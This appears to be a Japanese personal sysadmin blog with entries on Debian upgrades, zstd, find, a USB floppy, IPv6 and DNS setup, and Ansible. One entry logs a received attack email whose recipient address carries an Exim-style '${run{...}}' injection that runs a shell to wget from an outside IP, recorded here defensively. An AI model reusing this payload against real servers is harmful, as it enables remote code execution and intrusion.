トップ 追記

屑俺日記

僕の備忘録(PC、UN*X、ネットワーク関連が中心)なんです。
自分の書いたところは適当(な時とか)に書き換えますので御了承を。


2019-08-18(Sun) ちょっとばかり秋っぽく

テザリングでdist-upgrade

MacMiniのstretchをbusterにあげた。sed -i s/stretch/buster/ の 後に、dist-upgrade。一時間半くらいか。

日本語IMが何だったのか忘れた。ともかく、設定していた ON/OFFキーバインドも消えていた。
fcitxを放り込み、fcitx-config-gtk3で Ctrl-o に設定し zenkaku-hankakuを削除。そしてuim-* をpurge。

とりあえずはそれ以外、問題なし。

$ lsb_release  -a
No LSB modules are available.
Distributor ID:	Debian
Description:	Debian GNU/Linux 10 (buster)
Release:	10
Codename:	buster

ちょっと頭をメールに戻すために

ここ一週間ほどから。

$ sudo sed -n '1p; $p' /var/log/mail.log | \
> awk '{print $1,$2,$3}'
Aug 11 06:25:38
Aug 18 07:45:01
 
$ sudo grep Invalid /var/log/mail.log | \
>  awk -F':' '{print $5,$6}' | \
>  sort | uniq -c | sort -n | tail -n5
      6  unknown[68.183.179.17]  SASL LOGIN authentication failed
      7  unknown[165.22.146.224]  SASL LOGIN authentication failed
    167  unknown[134.209.31.192]  SASL LOGIN authentication failed
    600  unknown[185.234.219.118]  SASL LOGIN authentication failed
   5738  unknown[185.234.219.57]  SASL LOGIN authentication failed

2019-08-13(Tue) 祝祭日でない休みの一日目

zstd

知るのが遅かったが、早くてもどうということはなさげ。
junk フォルダをtarでアーカイブし、圧縮してみる。
単にアーカイブしただけのtarを除き、最大の圧縮率になる オプションを付与。

$ find junk -type f | wc -l
38
$ du -h junk | tail -n1
3.7M    junk
$ tar cf j.tar junk
 
$ zstd -19 -zc j.tar.zst
$ ls -alFh j.*
-rw-r--r-- 1 user group 5.6M  8月 13 07:26 j.tar
-rw-r--r-- 1 user group 1.4M  8月 13 07:30 j.tar.bz2
-rw-r--r-- 1 user group 1.7M  8月 13 07:30 j.tar.gz
-rw-r--r-- 1 user group 853K  8月 13 07:31 j.tar.xz
-rw-r--r-- 1 user group 967K  8月 13 07:34 j.tar.zst

デフォルトではgzip(--bestを付けても付けなくても同じようだ)と あまり変わらなかった。目一杯圧縮率をあげてやると、やはり少し 遅くなった。

$ time zstd -zc j.tar >/dev/null
j.tar  : 29.28%   (5836800 => 1708990 bytes, /*stdout*\)
 
real    0m0.101s
user    0m0.096s
sys     0m0.000s
$ time zstd -19 -zc j.tar >/dev/null
j.tar  : 16.96%   (5836800 => 989747 bytes, /*stdout*\)
 
real    0m2.267s
user    0m2.212s
sys     0m0.048s

2019-08-10(Sat) 夏も盛りか

phpmyadmin

phpmyadmin error

前回に書いたのは ほんの一年前か。
WordPressついでにbasercmsも試してみながら、データベースの 構造を少し見たくなって、bionicに入れてみる。もちろん 他所様にアクセスされにくいよう、適当にファイアウォールは かけている。

なんか 面白そうなエラーが出た。

DROP  tcp  -- !$UNICAST_IPv4 0.0.0.0/0  multiport dports 80,443,3306
Warning in ./libraries/sql.lib.php#613
count(): Parameter must be an array or an object that implements Countable
 
Backtrace
 
./libraries/sql.lib.php#2128: PMA_isRememberSortingOrder(array)
./libraries/sql.lib.php#2079: PMA_executeQueryAndGetQueryResponse(
array,
boolean true,
string 'basercms',
string 'mysite_users',

てけとうに検索すると、根本的にはバージョン(4:4.6.6-5)が古すぎるのが問題点 と思えた。本家バージョン( ちなみに本家の最新安定版は 4.9.0.1)で 2年半ほど前、そして bionicのChangelogでも 2年前
もちろん 脆弱性情報はその後もちびちびと出続けて。


2019-08-06(Tue) 曇っているかも

find -and

前に書いたかもしれないが、まぁいいか。

$ for x in `seq 9`; do touch -d 2019070${x} 2019070${x}.txt; done
 
$ ls -l
合計 0
-rw-rw-r-- 1 user group 0  7月  1 00:00 20190701.txt
-rw-rw-r-- 1 user group 0  7月  2 00:00 20190702.txt
-rw-rw-r-- 1 user group 0  7月  3 00:00 20190703.txt
-rw-rw-r-- 1 user group 0  7月  4 00:00 20190704.txt
-rw-rw-r-- 1 user group 0  7月  5 00:00 20190705.txt
-rw-rw-r-- 1 user group 0  7月  6 00:00 20190706.txt
-rw-rw-r-- 1 user group 0  7月  7 00:00 20190707.txt
-rw-rw-r-- 1 user group 0  7月  8 00:00 20190708.txt
-rw-rw-r-- 1 user group 0  7月  9 00:00 20190709.txt
$ find . -type f  -mtime -33 -exec ls -alFh {} \; | sort
-rw-rw-r-- 1 user group 0  7月  5 00:00 ./20190705.txt
-rw-rw-r-- 1 user group 0  7月  6 00:00 ./20190706.txt
-rw-rw-r-- 1 user group 0  7月  7 00:00 ./20190707.txt
-rw-rw-r-- 1 user group 0  7月  8 00:00 ./20190708.txt
-rw-rw-r-- 1 user group 0  7月  9 00:00 ./20190709.txt
$  find . -type f -mtime +30 -exec ls -alFh {} \; | sort
-rw-rw-r-- 1 user group 0  7月  1 00:00 ./20190701.txt
-rw-rw-r-- 1 user group 0  7月  2 00:00 ./20190702.txt
-rw-rw-r-- 1 user group 0  7月  3 00:00 ./20190703.txt
-rw-rw-r-- 1 user group 0  7月  4 00:00 ./20190704.txt
-rw-rw-r-- 1 user group 0  7月  5 00:00 ./20190705.txt
-rw-rw-r-- 1 user group 0  7月  6 00:00 ./20190706.txt
$ find . -type f -mtime +30 -and -mtime -33 -exec ls -alFh {} \; | sort
-rw-rw-r-- 1 user group 0  7月  5 00:00 ./20190705.txt
-rw-rw-r-- 1 user group 0  7月  6 00:00 ./20190706.txt

2019-08-05(Mon) 久々

超久々のフロッピー

偶然、 USBのフロッピーディスクドライブ とメディア(IMATION 2HD)が手元にあった。
このところ サポートを中止する しないのと色々。
もっともUSBだから本品は関係ないはずだけど。

手近な bionicに挿してみる。
カーネル(4.15.0-55-generic)のconfigは、 CONFIG_INTEL_IOMMU_FLOPPY_WA=y であった。

[ 1761.562968] usb 3-6: new full-speed USB device number 6 using xhci_hcd
[ 1761.713460] usb 3-6: New USB device found, idVendor=057b, idProduct=0000
[ 1761.713465] usb 3-6: New USB device strings: Mfr=1, Product=2, SerialNumber=0
[ 1761.713468] usb 3-6: Product: USB Floppy Drive
[ 1761.713470] usb 3-6: Manufacturer: Y-E DATA
[ 1761.792579] usb-storage 3-6:1.0: USB Mass Storage device detected
[ 1761.792664] scsi host5: usb-storage 3-6:1.0
[ 1761.792744] usbcore: registered new interface driver usb-storage
[ 1762.821216] scsi 5:0:0:0: Direct-Access     Y-E DATA USB-FDU          5.01 PQ: 0 ANSI: 0 CCS
[ 1762.821920] sd 5:0:0:0: Attached scsi generic sg2 type 0
[ 1762.837054] sd 5:0:0:0: Power-on or device reset occurred
[ 1762.901119] sd 5:0:0:0: [sdb] Attached SCSI removable disk

ロードされたデバイスドライバはusb_storageだけだった。
フロッピーディスクを入れてみた。

$ sudo fdisk -l /dev/sdb
ディスク /dev/sdb: 1.4 MiB, 1474560 バイト, 2880 セクタ
単位: セクタ (1 * 512 = 512 バイト)
セクタサイズ (論理 / 物理): 512 バイト / 512 バイト
I/O サイズ (最小 / 推奨): 512 バイト / 512 バイト
ディスクラベルのタイプ: dos
ディスク識別子: 0x6f20736b
 
デバイス   起動   開始位置   最後から     セクタ サイズ Id タイプ
/dev/sdb1        778135908 1919645538 1141509631 544.3G 72 不明
/dev/sdb2        168689522 2104717761 1936028240 923.2G 65 Novell Netware 386
/dev/sdb3       1869881465 3805909656 1936028192 923.2G 79 不明
/dev/sdb4                0 3637226495 3637226496   1.7T  d 不明
 
パーティション情報の項目がディスクの順序と一致しません

フロッピーの中身をdd(1)で吸い出してみたが、

$ sudo losetup /dev/loop0 fdd.img 
losetup: fdd.img: ループバックデバイスの設定に失敗しました:
 デバイスもしくはリソースがビジー状態です

新たにfdiskすると、普通に利用できるようだ。

$ time sudo mkfs -t ext4 /dev/sdb1 
mke2fs 1.44.1 (24-Mar-2018)
 
Filesystem too small for a journal
Creating filesystem with 1436 1k blocks and 184 inodes
 
Allocating group tables: done                            
Writing inode tables: done                            
Writing superblocks and filesystem accounting information: done
 
 
real    0m5.968s
user    0m0.017s
sys     0m0.007s

1MBのファイルコピーには1秒かからなかったが、その直後にsyncすると 13秒。

$ time sudo  cp 1M.img /media/makoto/c8091ef5-8382-4301-81b1-8c17fc8db40e/
 
real    0m0.961s
user    0m0.012s
sys     0m0.007s
$ time sync
 
real    0m13.246s
user    0m0.001s
sys     0m0.002s

もともとあったデータを書き戻すのに

$ time sudo  dd if=fdd.img of=/dev/sdb
2880+0 レコード入力
2880+0 レコード出力
1474560 bytes (1.5 MB, 1.4 MiB) copied, 85.6155 s, 17.2 kB/s
 
real	1m25.632s
user	0m0.019s
sys	0m0.044s

書き込み時でないときも間欠的に響く、 唸るような動作音でひとしきり懐旧の念にひたると。


2019-07-29(Mon) 真夏

find 複数判別式

記述のエラーとしばらく格闘する。

letsencrypt$ sudo find . -type l \
>  \( -name fullchain\*.pem -or -name privkey\*.pem \) \
>  -exec ls -alF {} \;
lrwxrwxrwx 1 root root 51  7月 29 18:23 ./live/DOMAIN/fullchain.pem -> 
  ../../archive/DOMAIN/fullchain6.pem
lrwxrwxrwx 1 root root 49  7月 29 18:23 ./live/DOMAIN/privkey.pem -> 
  ../../archive/DOMAIN/privkey6.pem

2019-07-23(Tue) 長く書いてないが、時には

v6アドレス手打ち割当

クラウドの再インストールで、固定で割り当てていたIPv6アドレス がなくなってしまった。/etc/network/interfacesに書いたが、 再起動が面倒になった。
環境は xenial 64bit。

$ sudo ip -6 addr add dev eth0 UNICAST_IPV6_ADDR/64
$ sudo ip -6 route add default via fe80::1 dev eth0
 
$ sudo ip -6 route show
UNICAST_IPv6_ADDR/64 dev eth0  proto kernel  metric 256  pref medium
fe80::/64 dev eth0  proto kernel  metric 256  pref medium
default via fe80::1 dev eth0  metric 1024  pref medium

これでリモートのping6に応答するようになった。
gateway は環境によっては違うかも。


2019-07-05(Fri) 降るかと思ったら降らないっぽい

片方には伝わって、片方には伝わらない

新しいホストをVPSで立てて、IPv4、IPv6を設定し、 ともにDNSサーバに登録する。
IPv4は問題なく、すぐ解決できた。
しかし、同じVPSでIPv6の名前解決に成功したり失敗したり。

$ cat /etc/resolv.conf
search DOMAIN.TLD
nameserver SERVER_A
nameserver SERVER_B
$ dig @SERVER_A  MYHOST.DOMAIN.TLD AAAA +noall +answer
; <<>> DiG 9.10.3-P4-Debian <<>> @SERVER_A MYHOST.DOMAIN.TLD AAAA +noall +answer
; (1 server found)
;; global options: +cmd
 
$ dig @SERVER_B  MYHOST.DOMAIN.TLD AAAA +noall +answer
; <<>> DiG 9.10.3-P4-Debian <<>> @SERVER_B MYHOST.DOMAIN.TLD AAAA +noall +answer
; (1 server found)
;; global options: +cmd
MYHOST.DOMAIN.TLD.    3076    IN      AAAA    QUAD_ADDR

DOMAIN.TLD のNS2つに問い合わせて、問題なしを得た。
@8.8.8.8 や @1.1.1.1もちゃんと返った。
SERVER_Aに+trace をつけるとAAAAは返ってきたが、無しだと やはり駄目だった。

今はどちらもOKになっているが、いつなったのかは見過ごしていた。


2019-06-30(Sun) 曇って大風

bionic色々

bionicでansible色々。
LXCとconoha VPSは通るplaybookが、さくらのVPSに限って 初っ端からひっかかってしまう。

- name: copy apt conf
  copy: src=files/{{ debian_code }}.list \
     dest=/etc/apt/sources.list
  become: yes 
$ time ansible-playbook hoge.yml
 ____________
<PLAY [SERVER]>
 ------------
        \   ^__^
         \  (oo)\_______
            (__)\       )\/\
                ||----w |
                ||     ||
 
 ________________________
<TASK [Gathering Facts]>
 ------------------------
        \   ^__^
         \  (oo)\_______
            (__)\       )\/\
                ||----w |
                ||     ||
ok: [SERVER_NAME]
 _______________________________
<TASK [common : copy apt conf]>
 -------------------------------
        \   ^__^
         \  (oo)\_______
            (__)\       )\/\
                ||----w |
                ||     ||
 
fatal: [SERVER_NAME]: FAILED! => 
  {"msg": "Failed to get information on remote file
  (/etc/apt/sources.list):
  Connection to SERVER_NAME closed.\r\n"}

どうもpasswordで嵌っていたらしい。
ansibleのログインユーザのパスワードを設定し、hostsにも ansible_sudo_passwordを指定してやるとできてしまった。
ログインは公開鍵認証に設定していたし、sudo もpasswordを要求 されなかったが、パスワード設定自体は(よく分からないが) 要ったらしい。


2019-06-20(Thu) 今日も曇ってるが、降らないっぽい

どうやら攻撃メール着弾とみた。

Sylpheedで妙なのが。

件名      差出人      日付
(件名なし)(差出人不明)(日付なし)
(件名なし)(差出人不明)(日付なし)
(件名なし)(差出人不明)(日付なし)

メールは次のような内容だった。

Return-Path: <support@service.com>
X-Original-To: root+${run{x2Fbinx2Fsht-ctx22wgetx2064.50.180.45x2ftmpx2fSERVER_IPv4_ADDRx22}}@MY_DOMAIN
Delivered-To: root+${run{x2Fbinx2Fsht-ctx22wgetx2064.50.180.45x2ftmpx2fSERVER_IPv4_ADDRx22}}@MY_DOMAIN
Received: from service.com (unknown [46.101.19.140])
        by $MAIL_SERVER (Postfix) with SMTP id 79287360200;
        Thu, 20 Jun 2019 00:38:09 +0900 (JST)
Authentication-Results: $MAIL_SERVER; dkim=permerror (bad message/signature format)
Received: 1
Received: 2
Received: 3
.
.
.
Received: 31

ついでにログも。

$ sudo grep 79287360200 /var/log/mail.log | sed 's/^.\{24\}//'
postfix/smtpd[6458]: 79287360200: client=unknown[46.101.19.140]
postfix/cleanup[6463]: 79287360200: message-id=<>
opendkim[664]: 79287360200: can't determine message sender; accepting
postfix/qmgr[815]: 79287360200: from=<support@service.com>,
 size=715, nrcpt=3 (queue active)
postfix/virtual[6465]: 79287360200:
 to=<root+${run{x2Fbinx2Fsht-ctx22wgetx2064.50.180.45x2ftmpx2fSERVER_IPv4_ADDRx22}}@MYDOMAIN>,
 relay=virtual, delay=1.3, delays=1.3/0.01/0/0, dsn=2.0.0, status=sent (delivered to maildir)
postfix/local[6464]: 79287360200:
 to=<root+${run{x2Fbinx2Fsht-ctx22wgetx2064.50.180.45x2ftmpx2fSERVER_IPv4_ADDRx22}}@localhost>,
 relay=local, delay=1.4, delays=1.3/0.04/0/0.01, dsn=2.0.0, status=sent (forwarded as 8FA38360235)
postfix/local[6464]: 79287360200:
 to=<root+${run{x2Fbinx2Fsht-ctx22wgetx2064.50.180.45x2ftmpx2fSERVER_IPv4_ADDRx22}}@MAIL_SERVER>,
 relay=local, delay=1.4, delays=1.3/0.05/0/0, dsn=2.0.0, status=sent (forwarded as 926CF36026C)
postfix/qmgr[815]: 79287360200: removed

適当にチェック。

メールサーバーのFQDNを こちらに投げてみた。

Connecting to SERVER_IPv4_ADDR
 
220 MAIL_SERVER ESMTP Postfix (Debian/GNU) [852 ms]
EHLO keeper-us-east-1b.mxtoolbox.com
250-MAIL_SERVER
250-PIPELINING
250-SIZE 31457280
250-ETRN
250-STARTTLS
250-AUTH CRAM-MD5
250-ENHANCEDSTATUSCODES
250-8BITMIME
250-DSN
250 SMTPUTF8 [788 ms]
MAIL FROM:<supertool@mxtoolbox.com>
250 2.1.0 Ok [805 ms]
RCPT TO:<test@mxtoolboxsmtpdiag.com>
454 4.7.1 <test@mxtoolboxsmtpdiag.com>: Relay access denied [786 ms]
 
LookupServer 5122ms

こちらのログも。

$ sudo grep 11970 /var/log/mail.log | sed 's/^.\{24\}//'
postfix/smtpd[11970]: connect from keeper-us-east-1b.mxtoolbox.com[52.55.244.91]
postfix/smtpd[11970]: NOQUEUE:
 reject: RCPT from keeper-us-east-1b.mxtoolbox.com[52.55.244.91]: 454 4.7.1
 <test@mxtoolboxsmtpdiag.com>: Relay access denied;
 from=<supertool@mxtoolbox.com>
 to=<test@mxtoolboxsmtpdiag.com>
 proto=ESMTP helo=<keeper-us-east-1b.mxtoolbox.com>
postfix/smtpd[11970]: disconnect from keeper-us-east-1b.mxtoolbox.com[52.55.244.91]
 ehlo=1 mail=1 rcpt=0/1 quit=1 commands=3/4

リンクはご自由にどうぞ。でもURLや内容が変った場合はあしからず。

index.htmlは ここから。